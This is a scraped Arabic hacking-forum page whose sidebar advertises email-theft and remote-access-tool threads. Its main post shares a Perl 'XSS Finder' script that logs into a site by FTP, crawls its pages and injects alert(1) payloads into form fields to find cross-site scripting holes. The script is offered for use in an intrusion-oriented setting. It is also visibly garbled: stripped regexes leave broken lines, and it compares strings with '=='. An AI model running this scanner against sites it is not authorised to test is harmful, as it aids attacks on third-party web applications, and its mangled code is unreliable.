HACKER-KIRKUK

هاكرز كركوك@هاكر كركوك@برامج الاختراق @الاختراق الايميل@الاختراق المواقع@الاختراق المنتديات @برامج هاكرز هاكرز كركوك@هاكرز كركوك
 
الرئيسيةمكتبة الصورالتسجيلدخول
منتدى ترحب بكم
المواضيع الأخيرة
» اخترق الايميل من غير ارسال اي شيء للضحية.., إلى كل هكر
الأربعاء يناير 28, 2015 6:59 pm من طرف karim.dad23

» برنامج اختراق رهيب عربى Bifrost Arabic مع الشرح بصور
الأحد ديسمبر 21, 2014 9:42 pm من طرف تاغرمين الزنتان

» السلام عليكم
الأربعاء نوفمبر 26, 2014 12:47 am من طرف SNIP_FOREVER

» السلام عليكم "
الأربعاء نوفمبر 26, 2014 12:41 am من طرف SNIP_FOREVER

» افضل كتاب لتعليم اختراق المواقع من الصفر
الثلاثاء يونيو 10, 2014 9:51 pm من طرف tored

» برنامج لاسترجاع كلمة ملفات الورد وليس التخمين
الجمعة يونيو 06, 2014 3:06 am من طرف mo7amed

» أسهل طريقة لسرقة الايميل بدون برامج ومضمونه 100%
الجمعة يناير 17, 2014 4:05 pm من طرف salmi3

» اختراق نيوبكس
الإثنين ديسمبر 09, 2013 9:08 pm من طرف thepalehorse

» افضل برنامج اختراق في العالم تستخدمه كبار الشركات الامريكية والهكرفي التجسس حصري
الإثنين ديسمبر 09, 2013 2:06 pm من طرف thepalehorse

بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
ازرار التصفُّح
 البوابة
 الفهرس
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 ابحـث
التبادل الاعلاني
أفضل 10 أعضاء في هذا المنتدى
جنيد
 
هاكر مدينة
 
xxx.hacker.xxx
 
samooo999
 
سام الصمود
 
هاكر كركوك
 
هكر (بن الموت)
 
sara
 
lena
 
(((hacker_-_xxx)))
 
منتدى ترحب بكم

شاطر | 
 

 [Perl] Cross Site Scripting Finder Script

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
samooo999

avatar

ذكر
عدد الرسائل : 39
العمر : 29
الموقع : argentina
العمل/الترفيه : com act
المزاج : رواق
تاريخ التسجيل : 21/01/2010

مُساهمةموضوع: [Perl] Cross Site Scripting Finder Script   السبت فبراير 06, 2010 11:02 pm

########################################
#
# Author: darkjoker
#
# Site: http://xhacker.altervista.org
#
# Program: XSS Finder
#
# Sintax: perl xss_finder.pl []
#
# Copyright (C) 2008 darkjoker This program is free software: you can redistribute
# it and/or modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or (at your option)
# any later version. This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the Public License # GNU General for more details.
# You should have received a copy of the GNU General Public License along with this
# program. If not, see .
#
#
########################################

#!/usr/bin/perl
use IO::Socket;
use Net::FTP;
$host = shift or die "Usage: perl $0 []\n";
$user = shift or die "Usage: perl $0 []\n";
$pass = shift or die "Usage: perl $0 []\n";
$log_file = shift;
$ftp=Net::FTP->new($host) or die "Impossibile connettersi a $host.\n";
$ftp->login ($user, $pass) or die "Errore durante il login.\n";
@file = $ftp->ls ();
$cont4 = 0;
$log = "Scansione sito: $host\n";
while ($cont4 < scalar (@file)){
my $sock = new IO::Socket::INET (
PeerHost => $host,
PeerPort => "80",
Proto => "tcp",
) or die "Impossibile connettersi a $host: $!\n";
$page = "";
print $sock "get /@file[$cont4]\n\n";
while (<$sock>){
$page .= $_;
}
my (@variabili, @var_method);
$cont2 = 0;
$cont = 0;
while ($cont <= length ($page)){
if ($page =~ / $method = $2;
$page =~ /(.+?)<\/form>/;
$cont5 = 0;
$in_form = $1;
while ($cont5 <= length ($in_form)){
if ($in_form =~ /<(input|textarea).+?name.+?('|")(.+?)("|')/){
@variabili [$cont2] = $3;
@var_method [$cont2] = $method;
$in_form =~ s/<(input|textarea).+?name.+?('|")(.+?)("|')/done/;
}
$cont5++;
}
$page =~ s/ }
$cont++;
}
close ($sock);
$cont3 = 0;
while ($cont3 < scalar (@variabili)){
my $sock = new IO::Socket::INET(
PeerHost => $host,
PeerPort => "80",
Proto => "tcp",
) or die "Impossibile connettersi a $host.\n";
if (@var_method[$cont3] == "GET"){
print $sock "get /@file[$cont4]?@variabili[$cont3]=alert(1)\n\n";
}
elsif (@var_method[$cont3] == "POST"){
$var = "@variabili[$cont3]=alert(1)";
$to_send = "POST /pagina\n".
"Host: $host\n".
"Content-Type: application/x-www-form-urlencoded\n".
"Content-Length: ".length($var)."\n\n".
$var."\n\n";
print $sock $to_send;
}
else {
die "@var_method[$cont3]: Metodo sconosciuto.\n";
}
$page2 = "";
while (<$sock>){
$page2 .= $_;
}
if ($page2 =~ /alert\(1\)<\/script>/){
print "/@file[$cont4]: @variabili[$cont3] vulnerabile.\n";
$log .= "\n/@file[$cont4]: @variabili[$cont3] vulnerabile.";
}
$cont3++;
close ($sock);
}
$cont4++;
}
if ($log_file != ""){
open (LOG, $log_file) or die "Errore durante l'apertura del file: $!\n";
print LOG $log;
close ($log);
}
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://www.myspace.com/samooo999
 
[Perl] Cross Site Scripting Finder Script
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» درس تعريف الموقع ( site ) على السيرفر المحلي
» تغطية معرض فورميلا الأهرام الدولى 2010 فى دورتة السابعة عشر الجزء الثانى
» لمن يحب تعلم الانجليزية
» L'Université Mentouri

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
HACKER-KIRKUK :: حمـــاية الـــشـــبكات-
انتقل الى: